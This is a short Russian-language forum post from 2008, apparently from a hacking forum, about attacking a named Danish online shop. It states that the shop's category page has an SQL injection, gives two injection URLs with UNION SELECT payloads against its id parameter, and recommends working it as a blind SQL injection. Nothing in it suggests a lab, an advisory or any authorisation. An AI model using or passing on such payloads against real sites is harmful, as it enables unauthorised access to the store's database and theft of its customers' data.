06.12.2008, 14:20
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Там есть иньекция, но перебирать придется вслепую, так как там сложный запрос с left join, фильтр там /*
http://www.viper-shop.dk/category.php?id=180%27+union+select+1/*
потому что если подставить
http://www.viper-shop.dk/category.php?id=180%27+union+select+1--
то совсем другой рез-т. Т.е. с этой ссылкой надо поработать как с Blind SQL-inj
|
|
|